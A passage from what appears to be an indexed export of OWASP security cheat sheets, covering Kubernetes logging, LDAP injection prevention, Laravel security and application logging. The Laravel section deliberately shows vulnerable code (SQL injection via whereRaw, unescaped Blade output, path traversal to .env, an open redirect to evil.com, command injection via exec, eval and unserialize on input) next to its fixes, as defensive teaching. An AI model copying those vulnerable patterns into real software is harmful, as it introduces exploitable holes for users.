kubectl apply -f example.yaml\n

To take a look the logs for this container, run:

kubectl log <container-name> command.\n

Pod Manifest is as follows:

apiVersion: v1\nkind: Pod\nmetadata:\nname: example\nspec:\ncontainers:\n- name: example\nimage: busybox\nargs:\n- /bin/sh\n- -c\n- >\nwhile true;\ndo\necho \"$(date)\\n\" >> /var/log/example.log;\nsleep 1;\ndone\nvolumeMounts:\n- name: varlog\nmountPath: /var/log\n- name: sidecar\nimage: busybox\nargs: [/bin/sh, -c, 'tail -f /var/log/example.log']\nvolumeMounts:\n- name: varlog\nmountPath: /var/log\nvolumes:\n- name: varlog\nemptyDir: {}\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#node-logging","title":"Node logging","text":"

When a container running on Kubernetes writes its logs to stdout or stderr streams, the container engine streams them to the logging driver configured in Kubernetes.

In most cases, these logs will end up in the /var/log/containers directory on your host. Docker supports multiple logging drivers but unfortunately, driver configuration is not supported via the Kubernetes API.

Once a container is terminated or restarted, kubelet stores logs on the node. To prevent these files from consuming all of the host\u2019s storage, the Kubernetes node implements a log rotation mechanism. When a container is evicted from the node, all containers with corresponding log files are evicted.

Depending on what operating system and additional services you\u2019re running on your host machine, you might need to take a look at additional logs. For example, systemd logs can be retrieved using the following command:

journalctl -u\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#cluster-logging","title":"Cluster logging","text":"

On the level of the Kubernetes cluster itself, there is a long list of cluster components that can be logged as well as additional data types that can be used (events, audit logs). Together, these different types of data can give you visibility into how Kubernetes is performing as a ystem.

Some of these components run in a container, and some of them run on the operating system level (in most cases, a systemd service). The systemd services write to journald, and components running in containers write logs to the /var/log directory, unless the container engine has been configured to stream logs differently.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#events","title":"Events","text":"

Kubernetes events can indicate any Kubernetes resource state changes and errors, such as exceeded resource quota or pending pods, as well as any informational messages. Kubernetes events can indicate any Kubernetes resource state changes and errors, such as exceeded resource quota or pending pods, as well as any informational messages.

The following command returns all events within a specific namespace:

kubectl get events -n <namespace>\n\nNAMESPACE LAST SEEN TYPE   REASON OBJECT MESSAGE\nkube-system  8m22s  Normal   Scheduled            pod/metrics-server-66dbbb67db-lh865                                       Successfully assigned kube-system/metrics-server-66dbbb67db-lh865 to aks-agentpool-42213468-1\nkube-system     8m14s               Normal    Pulling                   pod/metrics-server-66dbbb67db-lh865                                       Pulling image \"aksrepos.azurecr.io/mirror/metrics-server-amd64:v0.2.1\"\nkube-system     7m58s               Normal    Pulled                    pod/metrics-server-66dbbb67db-lh865                                       Successfully pulled image \"aksrepos.azurecr.io/mirror/metrics-server-amd64:v0.2.1\"\nkube-system     7m57s               Normal     Created                   pod/metrics-server-66dbbb67db-lh865                                       Created container metrics-server\nkube-system     7m57s               Normal    Started                   pod/metrics-server-66dbbb67db-lh865                                       Started container metrics-server\nkube-system     8m23s               Normal    SuccessfulCreate          replicaset/metrics-server-66dbbb67db             Created pod: metrics-server-66dbbb67db-lh865\n

The following command will show the latest events for this specific Kubernetes resource:

kubectl describe pod <pod-name>\n\nEvents:\n  Type    Reason     Age   From                               Message\n  ----    ------     ----  ----                               -------\n  Normal  Scheduled  14m   default-scheduler                  Successfully assigned kube-system/coredns-7b54b5b97c-dpll7 to aks-agentpool-42213468-1\n  Normal  Pulled     13m   kubelet, aks-agentpool-42213468-1  Container image \"aksrepos.azurecr.io/mirror/coredns:1.3.1\" already present on machine\n  Normal  Created    13m   kubelet, aks-agentpool-42213468-1  Created container coredns\n  Normal  Started    13m   kubelet, aks-agentpool-42213468-1  Started container coredns\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#final-thoughts","title":"Final thoughts","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#embed-security-earlier-into-the-container-lifecycle","title":"Embed security earlier into the container lifecycle","text":"

You must integrate security earlier into the container lifecycle and ensure alignment and shared goals between security and DevOps teams. Security can (and should) be an enabler that allows your developers and DevOps teams to confidently build and deploy applications that are production-ready for scale, stability and security.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-native-security-controls-to-reduce-operational-risk","title":"Use Kubernetes-native security controls to reduce operational risk","text":"

Leverage the native controls built into Kubernetes whenever available in order to enforce security policies so that your security controls don\u2019t collide with the orchestrator. Instead of using a third-party proxy or shim to enforce network segmentation, as an example, use Kubernetes network policies to ensure secure network communication.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#leverage-the-context-that-kubernetes-provides-to-prioritize-remediation-efforts","title":"Leverage the context that Kubernetes provides to prioritize remediation efforts","text":"

In sprawling Kubernetes environments, manually triaging security incidents and policy violations is time consuming.

For example, a deployment containing a vulnerability with severity score of 7 or greater should be moved up in remediation priority if that deployment contains privileged containers and is open to the Internet but moved down if it\u2019s in a test environment and supporting a non-critical app.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#references","title":"References","text":"

Master documentation - https://kubernetes.io

  1. Kubernetes Security Best Practices everyone must follow - https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow
  2. Securing a Cluster - https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment
  3. Security Best Practices for Kubernetes Deployment - https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster
  4. Kubernetes Security Best Practices - https://phoenixnap.com/kb/kubernetes-security-best-practices
  5. Kubernetes Security 101: Risks and 29 Best Practices - https://www.stackrox.com/post/2020/05/kubernetes-security-101
  6. 15 Kubernetes security best practice to secure your cluster - https://www.mobilise.cloud/15-kubernetes-security-best-practice-to-secure-your-cluster
  7. The Ultimate Guide to Kubernetes Security - https://neuvector.com/container-security/kubernetes-security-guide
  8. A hacker's guide to Kubernetes security - https://techbeacon.com/enterprise-it/hackers-guide-kubernetes-security
  9. 11 Ways (Not) to Get Hacked - https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked
  10. 12 Kubernetes configuration best practices - https://www.stackrox.com/post/2019/09/12-kubernetes-configuration-best-practices/#6-securely-configure-the-kubernetes-api-server
  11. A Practical Guide to Kubernetes Logging - https://logz.io/blog/a-practical-guide-to-kubernetes-logging
  12. Kubernetes Web UI (Dashboard) - https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard
  13. Tesla cloud resources are hacked to run cryptocurrency-mining malware - https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware
  14. OPEN POLICY AGENT: CLOUD-NATIVE AUTHORIZATION - https://blog.styra.com/blog/open-policy-agent-authorization-for-the-cloud
  15. Introducing Policy As Code: The Open Policy Agent (OPA) - https://www.magalix.com/blog/introducing-policy-as-code-the-open-policy-agent-opa
  16. What service mesh provides - https://aspenmesh.io/wp-content/uploads/2019/10/AspenMesh_CompleteGuide.pdf
  17. Three Technical Benefits of Service Meshes and their Operational Limitations, Part 1 - https://glasnostic.com/blog/service-mesh-istio-limits-and-benefits-part-1
  18. Open Policy Agent: What Is OPA and How It Works (Examples) - https://spacelift.io/blog/what-is-open-policy-agent-and-how-it-works
  19. Send Kubernetes Metrics To Kibana and Elasticsearch - https://logit.io/sources/configure/kubernetes/
  20. Kubernetes Security Checklist - https://kubernetes.io/docs/concepts/security/security-checklist/
"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html","title":"LDAP Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheatsheet is focused on providing clear, simple, actionable guidance for preventing LDAP Injection flaws in your applications.

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection.

LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree.

For more information on LDAP Injection attacks, visit LDAP injection.

LDAP injection attacks are common due to two factors:

  1. The lack of safer, parameterized LDAP query interfaces
  2. The widespread use of LDAP to authenticate users to systems.

Primary Defenses:

Additional Defenses:

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-1-escape-all-variables-using-the-right-ldap-encoding-function","title":"Defense Option 1: Escape all variables using the right LDAP encoding function","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#distinguished-name-escaping","title":"Distinguished Name Escaping","text":"

The main way LDAP stores names is based on DN (distinguished name). You can think of this like a unique identifier. These are sometimes used to access resources, like a username.

A DN might look like this

cn=Richard\u00a0Feynman,\u00a0ou=Physics\u00a0Department,\u00a0dc=Caltech,\u00a0dc=edu

or

uid=inewton,\u00a0ou=Mathematics\u00a0Department,\u00a0dc=Cambridge,\u00a0dc=com

There are certain characters that are considered special characters in a DN.

The exhaustive list is the following: \\ # + < > , ; \" = and leading or trailing spaces.

Some \"special\" characters that are allowed in Distinguished Names and do not need to be escaped include:

* ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! '\n
"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#search-filter-escaping","title":"Search Filter Escaping","text":"

Each DN points to exactly 1 entry, which can be thought of sort of like a row in a RDBMS. For each entry, there will be 1 or more attributes which are analogous to RDBMS columns. If you are interested in searching through LDAP for users will certain attributes, you may do so with search filters.

In a search filter, you can use standard boolean logic to get a list of users matching an arbitrary constraint. Search filters are written in Polish notation AKA prefix notation.

Example:

(&(ou=Physics)(|\n(manager=cn=Freeman\u00a0Dyson,ou=Physics,dc=Caltech,dc=edu)\n(manager=cn=Albert\u00a0Einstein,ou=Physics,dc=Princeton,dc=edu)\n))\n

When building LDAP queries in application code, you MUST escape any untrusted data that is added to any LDAP query. There are two forms of LDAP escaping. Encoding for LDAP Search and Encoding for LDAP DN (distinguished name). The proper escaping depends on whether you are sanitizing input for a search filter, or you are using a DN as a username-like credential for accessing some resource.

Some \"special\" characters that are allowed in search filters and must be escaped include:

* ( ) \\ NUL\n

For more information on search filter escaping visit RFC4515.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#safe-java-escaping-example","title":"Safe Java Escaping Example","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#safe-c-sharp-net-tba-example","title":"Safe C Sharp .NET TBA Example","text":"

.NET AntiXSS (now the Encoder class) has LDAP encoding functions including Encoder.LdapFilterEncode(string), Encoder.LdapDistinguishedNameEncode(string) and Encoder.LdapDistinguishedNameEncode(string, bool, bool).

Encoder.LdapFilterEncode encodes input according to RFC4515 where unsafe values are converted to \\XX where XX is the representation of the unsafe character.

Encoder.LdapDistinguishedNameEncode encodes input according to RFC2253 where unsafe characters are converted to #XX where XX is the representation of the unsafe character and the comma, plus, quote, slash, less than and great than signs are escaped using slash notation (\\X). In addition to this a space or octothorpe (#) at the beginning of the input string is \\ escaped as is a space at the end of a string.

LdapDistinguishedNameEncode(string, bool, bool) is also provided so you may turn off the initial or final character escaping rules, for example if you are concatenating the escaped distinguished name fragment into the midst of a complete distinguished name.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-2-use-frameworks-that-automatically-protect-from-ldap-injection","title":"Defense Option 2: Use Frameworks that Automatically Protect from LDAP Injection","text":"

Safe NET Example

LINQ to Active Directory provides automatic LDAP encoding when building LDAP queries.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-3-additional-defenses","title":"Defense Option 3: Additional Defenses","text":"

Beyond adopting one of the two primary defenses, we also recommend adopting all of these additional defenses in order to provide defense in depth. These additional defenses are:

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":"

To minimize the potential damage of a successful LDAP injection attack, you should minimize the privileges assigned to the LDAP binding account in your environment.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#enabling-bind-authentication","title":"Enabling Bind Authentication","text":"

If LDAP protocol is configured with bind Authentication, attackers would not be able to perform LDAP injection attacks because of verification and authorization checks that are performed against valid credentials passed by the user. An attacker can still bypass bind authentication through an anonymous connection or by exploiting the use of unauthenticated bind: Anonymous Bind (LDAP) and Unauthenticated Bind (LDAP).

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#allow-list-input-validation","title":"Allow-List Input Validation","text":"

Input validation can be used to detect unauthorized input before it is passed to the LDAP query. For more information please see the Input Validation Cheat Sheet.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html","title":"Laravel Cheat Sheet","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheatsheet intends to provide security tips to developers building Laravel applications. It aims to cover all common vulnerabilities and how to ensure that your Laravel applications are secure.

The Laravel Framework provides in-built security features and is meant to be secure by default. However, it also provides additional flexibility for complex use cases. This means that developers unfamiliar with the inner workings of Laravel may fall into the trap of using complex features in a way that is not secure. This guide is meant to educate developers to avoid common pitfalls and develop Laravel applications in a secure manner.

You may also refer the Enlightn Security Documentation, which highlights common vulnerabilities and good practices on securing Laravel applications.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#the-basics","title":"The Basics","text":"
APP_DEBUG=false\n
php artisan key:generate\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cookie-security-and-session-management","title":"Cookie Security and Session Management","text":"

By default, Laravel is configured in a secure manner. However, if you change your cookie or session configurations, make sure of the following:

/**\n * The application's route middleware groups.\n *\n * @var array\n */\nprotected $middlewareGroups = [\n    'web' => [\n        \\App\\Http\\Middleware\\EncryptCookies::class,\n        ...\n    ],\n    ...\n];\n
'http_only' => true,\n
'domain' => null,\n
'same_site' => 'lax',\n
'secure' => null,\n
'lifetime' => 15,\n

You may also refer the Cookie Security Guide to learn more about cookie security and the cookie attributes mentioned above.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#authentication","title":"Authentication","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#guards-and-providers","title":"Guards and Providers","text":"

At its core, Laravel's authentication facilities are made up of \"guards\" and \"providers\". Guards define how users are authenticated for each request. Providers define how users are retrieved from your persistent storage.

Laravel ships with a session guard which maintains state using session storage and cookies, and a token guard for API tokens.

For providers, Laravel ships with a eloquent provider for retrieving users using the Eloquent ORM and the database provider for retrieving users using the database query builder.

Guards and providers can be configured in the config/auth.php file. Laravel offers the ability to build custom guards and providers as well.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#starter-kits","title":"Starter Kits","text":"

Laravel offers a wide variety of first party application starter kits that include in-built authentication features:

  1. Laravel Breeze: A simple, minimal implementation of all Laravel's authentication features including login, registration, password reset, email verification and password confirmation.
  2. Laravel Fortify: A headless authentication backend that includes the above authentication features along with two-factor authentication.
  3. Laravel Jetstream: An application starter kit that provides a UI on top of Laravel Fortify's authentication features.

It is recommended to use one of these starter kits to ensure robust and secure authentication for your Laravel applications.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#api-authentication-packages","title":"API Authentication Packages","text":"

Laravel also offers the following API authentication packages:

  1. Passport: An OAuth2 authentication provider.
  2. Sanctum: An API token authentication provider.

Starter kits such as Fortify and Jetstream have in-built support for Sanctum.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#mass-assignment","title":"Mass Assignment","text":"

Mass assignment is a common vulnerability in modern web applications that use an ORM like Laravel's Eloquent ORM.

A mass assignment is a vulnerability where an ORM pattern is abused to modify data items that the user should not be normally allowed to modify.

Consider the following code:

Route::any('/profile', function (Request $request) {\n    $request->user()->forceFill($request->all())->save();\n\n    $user = $request->user()->fresh();\n\n    return response()->json(compact('user'));\n})->middleware('auth');\n

The above profile route allows the logged in user to change their profile information.

However, let's say there is an is_admin column in the users table. You probably do not want the user to be allowed to change the value of this column. However, the above code allows users to change any column values for their row in the users table. This is a mass assignment vulnerability.

Laravel has in-built features by default to protect against this vulnerability. Make sure of the following to stay secure:

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

SQL Injection attacks are unfortunately quite common in modern web applications and entail attackers providing malicious request input data to interfere with SQL queries. This guide covers SQL injection and how it can be prevented specifically for Laravel applications. You may also refer the SQL Injection Prevention Cheatsheet for more information that is not specific to Laravel.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#eloquent-orm-sql-injection-protection","title":"Eloquent ORM SQL Injection Protection","text":"

By default, Laravel's Eloquent ORM protects against SQL injection by parameterizing queries and using SQL bindings. For instance, consider the following query:

use App\\Models\\User;\n\nUser::where('email', $email)->get();\n

The code above fires the query below:

select * from `users` where `email` = ?\n

So, even if $email is untrusted user input data, you are protected from SQL injection attacks.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#raw-query-sql-injection","title":"Raw Query SQL Injection","text":"

Laravel also offers raw query expressions and raw queries to construct complex queries or database specific queries that aren't supported out of the box.

While this is great for flexibility, you must be careful to always use SQL data bindings for such queries. Consider the following query:

use Illuminate\\Support\\Facades\\DB;\nuse App\\Models\\User;\n\nUser::whereRaw('email = \"'.$request->input('email').'\"')->get();\nDB::table('users')->whereRaw('email = \"'.$request->input('email').'\"')->get();\n

Both lines of code actually execute the same query, which is vulnerable to SQL injection as the query does not use SQL bindings for untrusted user input data.

The code above fires the following query:

select * from `users` where `email` = \"value of email query parameter\"\n

Always remember to use SQL bindings for request data. We can fix the above code by making the following modification:

use App\\Models\\User;\n\nUser::whereRaw('email = ?', [$request->input('email')])->get();\n

We can even use named SQL bindings like so:

use App\\Models\\User;\n\nUser::whereRaw('email = :email', ['email' => $request->input('email')])->get();\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#column-name-sql-injection","title":"Column Name SQL Injection","text":"

You must never allow user input data to dictate column names referenced by your queries.

The following queries may be vulnerable to SQL injection:

use App\\Models\\User;\n\nUser::where($request->input('colname'), 'somedata')->get();\nUser::query()->orderBy($request->input('sortBy'))->get();\n

It is important to note that even though Laravel has some in-built features such as wrapping column names to protect against the above SQL injection vulnerabilities, some database engines (depending on versions and configurations) may still be vulnerable because binding column names is not supported by databases.

At the very least, this may result in a mass assignment vulnerability instead of a SQL injection because you may have expected a certain set of column values, but since they are not validated here, the user is free to use other columns as well.

Always validate user input for such situations like so:

use App\\Models\\User;\n\n$request->validate(['sortBy' => 'in:price,updated_at']);\nUser::query()->orderBy($request->validated()['sortBy'])->get();\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#validation-rule-sql-injection","title":"Validation Rule SQL Injection","text":"

Certain validation rules have the option of providing database column names. Such rules are vulnerable to SQL injection in the same manner as column name SQL injection because they construct queries in a similar manner.

For example, the following code may be vulnerable:

use Illuminate\\Validation\\Rule;\n\n$request->validate([\n    'id' => Rule::unique('users')->ignore($id, $request->input('colname'))\n]);\n

Behind the scenes, the above code triggers the following query:

use App\\Models\\User;\n\n$colname = $request->input('colname');\nUser::where($colname, $request->input('id'))->where($colname, '<>', $id)->count();\n

Since the column name is dictated by user input, it is similar to column name SQL injection.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cross-site-scripting-xss","title":"Cross Site Scripting (XSS)","text":"

XSS attacks are injection attacks where malicious scripts (such as JavaScript code snippets) are injected into trusted websites.

Laravel's Blade templating engine has echo statements {{ }} that automatically escape variables using the htmlspecialchars PHP function to protect against XSS attacks.

Laravel also offers displaying unescaped data using the unescaped syntax {!! !!}. This must not be used on any untrusted data, otherwise your application will be subject to an XSS attack.

For instance, if you have something like this in any of your Blade templates, it would result in a vulnerability:

{!! request()->input('somedata') !!}\n

This, however, is safe to do:

{{ request()->input('somedata') }}\n

For other information on XSS prevention that is not specific to Laravel, you may refer the Cross Site Scripting Prevention Cheatsheet.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#unrestricted-file-uploads","title":"Unrestricted File Uploads","text":"

Unrestricted file upload attacks entail attackers uploading malicious files to compromise web applications. This section describes how to protect against such attacks while building Laravel applications. You may also refer the File Upload Cheatsheet to learn more.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#always-validate-file-type-and-size","title":"Always Validate File Type and Size","text":"

Always validate the file type (extension or MIME type) and file size to avoid storage DOS attacks and remote code execution:

$request->validate([\n    'photo' => 'file|size:100|mimes:jpg,bmp,png'\n]);\n

Storage DOS attacks exploit missing file size validations and upload massive files to cause a denial of service (DOS) by exhausting the disk space.

Remote code execution attacks entail first, uploading malicious executable files (such as PHP files) and then, triggering their malicious code by visiting the file URL (if public).

Both these attacks can be avoided by simple file validations as mentioned above.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#do-not-rely-on-user-input-to-dictate-filenames-or-path","title":"Do Not Rely On User Input To Dictate Filenames or Path","text":"

If your application allows user controlled data to construct the path of a file upload, this may result in overwriting a critical file or storing the file in a bad location.

Consider the following code:

Route::post('/upload', function (Request $request) {\n    $request->file('file')->storeAs(auth()->id(), $request->input('filename'));\n\n    return back();\n});\n

This route saves a file to a directory specific to a user ID. Here, we rely on the filename user input data and this may result in a vulnerability as the filename could be something like ../2/filename.pdf. This will upload the file in user ID 2's directory instead of the directory pertaining to the current logged in user.

To fix this, we should use the basename PHP function to strip out any directory information from the filename input data:

Route::post('/upload', function (Request $request) {\n    $request->file('file')->storeAs(auth()->id(), basename($request->input('filename')));\n\n    return back();\n});\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#avoid-processing-zip-or-xml-files-if-possible","title":"Avoid Processing ZIP or XML Files If Possible","text":"

XML files can expose your application to a wide variety of attacks such as XXE attacks, the billion laughs attack and others. If you process ZIP files, you may be exposed to zip bomb DOS attacks.

Refer the XML Security Cheatsheet and the File Upload Cheatsheet to learn more.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#path-traversal","title":"Path Traversal","text":"

A path traversal attack aims to access files by manipulating request input data with ../ sequences and variations or by using absolute file paths.

If you allow users to download files by filename, you may be exposed to this vulnerability if input data is not stripped of directory information.

Consider the following code:

Route::get('/download', function(Request $request) {\n    return response()->download(storage_path('content/').$request->input('filename'));\n});\n

Here, the filename is not stripped of directory information, so a malformed filename such as ../../.env could expose your application credentials to potential attackers.

Similar to unrestricted file uploads, you should use the basename PHP function to strip out directory information like so:

Route::get('/download', function(Request $request) {\n    return response()->download(storage_path('content/').basename($request->input('filename')));\n});\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#open-redirection","title":"Open Redirection","text":"

Open Redirection attacks in themselves are not that dangerous but they enable phishing attacks.

Consider the following code:

Route::get('/redirect', function (Request $request) {\n   return redirect($request->input('url'));\n});\n

This code redirects the user to any external URL provided by user input. This could enable attackers to create seemingly safe URLs like https://example.com/redirect?url=http://evil.com. For instance, attackers may use a URL of this type to spoof password reset emails and lead victims to expose their credentials on the attacker's website.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cross-site-request-forgery-csrf","title":"Cross Site Request Forgery (CSRF)","text":"

Cross-Site Request Forgery (CSRF)\u00a0is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site when the user is authenticated.

Laravel provides CSRF protection out-of-the-box with the VerifyCSRFToken middleware. Generally, if you have this middleware in the web middleware group of your App\\Http\\Kernel class, you should be well protected:

/**\n * The application's route middleware groups.\n *\n * @var array\n */\nprotected $middlewareGroups = [\n    'web' => [\n        ...\n         \\App\\Http\\Middleware\\VerifyCsrfToken::class,\n         ...\n    ],\n];\n

Next, for all your POST request forms, you may use the @csrf blade directive to generate the hidden CSRF input token fields:

<form method=\"POST\" action=\"/profile\">\n    @csrf\n\n    <!-- Equivalent to... -->\n    <input type=\"hidden\" name=\"_token\" value=\"{{ csrf_token() }}\" />\n</form>\n

For AJAX requests, you can setup the X-CSRF-Token header.

Laravel also provides the ability to exclude certain routes from CSRF protection using the $except variable in your CSRF middleware class. Typically, you would want to exclude only stateless routes (e.g. APIs or webhooks) from CSRF protection. If any other routes are excluded, these may result in CSRF vulnerabilities.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#command-injection","title":"Command Injection","text":"

Command Injection vulnerabilities involve executing shell commands constructed with unescaped user input data.

For example, the following code performs a whois on a user provided domain name:

public function verifyDomain(Request $request)\n{\n    exec('whois '.$request->input('domain'));\n}\n

The above code is vulnerable as the user data is not escaped properly. To do so, you may use the escapeshellcmd and/or escapeshellarg PHP functions.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#other-injections","title":"Other Injections","text":"

Object injection, eval code injection and extract variable hijacking attacks involve unserializing, evaluating or using the extract function on untrusted user input data.

Some examples are:

unserialize($request->input('data'));\neval($request->input('data'));\nextract($request->all());\n

In general, avoid passing any untrusted input data to these dangerous functions.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#security-headers","title":"Security Headers","text":"

You should consider adding the following security headers to your web server or Laravel application middleware:

For more information, refer the OWASP secure headers project.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#tools","title":"Tools","text":"

You should consider using Enlightn, a static and dynamic analysis tool for Laravel applications that has over 45 automated security checks to identify potential security issues. There is both an open source version and a commercial version of Enlightn available. Enlightn includes an extensive 45 page documentation on security vulnerabilities and a great way to learn more on Laravel security is to just review its documentation.

You should also use the Enlightn Security Checker or the Local PHP Security Checker. Both of them are open source packages, licensed under the MIT and AGPL licenses respectively, that scan your PHP dependencies for known vulnerabilities using the Security Advisories Database.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html","title":"Logging Cheat Sheet","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is focused on providing developers with concentrated guidance on building application logging mechanisms, especially related to security logging.

Many systems enable network device, operating system, web server, mail server and database server logging, but often custom application event logging is missing, disabled or poorly configured. It provides much greater insight than infrastructure logging alone. Web application (e.g. web site or web service) logging is much more than having web server logs enabled (e.g. using Extended Log File Format).

Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#purpose","title":"Purpose","text":"

Application logging should always be included for security events. Application logs are invaluable data for:

Application logging might also be used to record other types of events too such as:

Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate.

The types of events and details collected will tend to be different.

For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little.

Use knowledge of the intended purposes to guide what, when and how much. The remainder of this cheat sheet primarily discusses security event logging.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#design-implementation-and-testing","title":"Design, implementation and testing","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-data-sources","title":"Event data sources","text":"

The application itself has access to a wide range of information events that should be used to generate log entries. Thus, the primary event data source is the application code itself.

The application has the most information about the user (e.g. identity, roles, permissions) and the context of the event (target, action, outcomes), and often this data is not available to either infrastructure devices, or even closely-related applications.

Other sources of information about application usage that could also be considered are:

The degree of confidence in the event information has to be considered when including event data from systems in a different trust zone. Data may be missing, modified, forged, replayed and could be malicious \u2013 it must always be treated as untrusted data.

Consider how the source can be verified, and how integrity and non-repudiation can be enforced.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#where-to-record-event-data","title":"Where to record event data","text":"

Applications commonly write event log data to the file system or a database (SQL or NoSQL). Applications installed on desktops and on mobile devices may use local storage and local databases, as well as sending data to remote storage.

Your selected framework may limit the available choices. All types of applications may send event data to remote systems (instead of or as well as more local storage).

This could be a centralized log collection and management system (e.g. SIEM or SEM) or another application elsewhere. Consider whether the application can simply send its event stream, unbuffered, to stdout, for management by the execution environment.

Consider separate files/tables for extended event information such as error stack traces or a record of HTTP request and response headers and bodies.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#which-events-to-log","title":"Which events to log","text":"

The level and content of security monitoring, alerting and reporting needs to be set during the requirements and design stage of projects, and should be proportionate to the information security risks. This can then be used to define what should be logged.

There is no one size fits all solution, and a blind checklist approach can lead to unnecessary \"alarm fog\" that means real problems go undetected.

Where possible, always log:

Optionally consider if the following events can be logged and whether it is desirable information:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-attributes","title":"Event attributes","text":"

Each log entry needs to include sufficient information for the intended subsequent monitoring and analysis. It could be full content data, but is more likely to be an extract or just summary properties.

The application logs must record \"when, where, who and what\" for each event.

The properties for these will be different depending on the architecture, class of application and host system/device, but often include the following:

Additionally consider recording:

For more information on these, see the \"other\" related articles listed at the end, especially the comprehensive article by Anton Chuvakin and Gunnar Peterson.

Note A: The \"Interaction identifier\" is a method of linking all (relevant) events for a single user interaction (e.g. desktop application form submission, web page request, mobile app button click, web service call). The application knows all these events relate to the same interaction, and this should be recorded instead of losing the information and forcing subsequent correlation techniques to re-construct the separate events. For example a single SOAP request may have multiple input validation failures and they may span a small range of times. As another example, an output validation failure may occur much later than the input submission for a long-running \"saga request\" submitted by the application to a database server.

Note B: Each organisation should ensure it has a consistent, and documented, approach to classification of events (type, confidence, severity), the syntax of descriptions, and field lengths & data types including the format used for dates/times.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#data-to-exclude","title":"Data to exclude","text":"

Never log data unless it is legally sanctioned. For example intercepting some communications, monitoring employees, and collecting some data without consent may all be illegal.

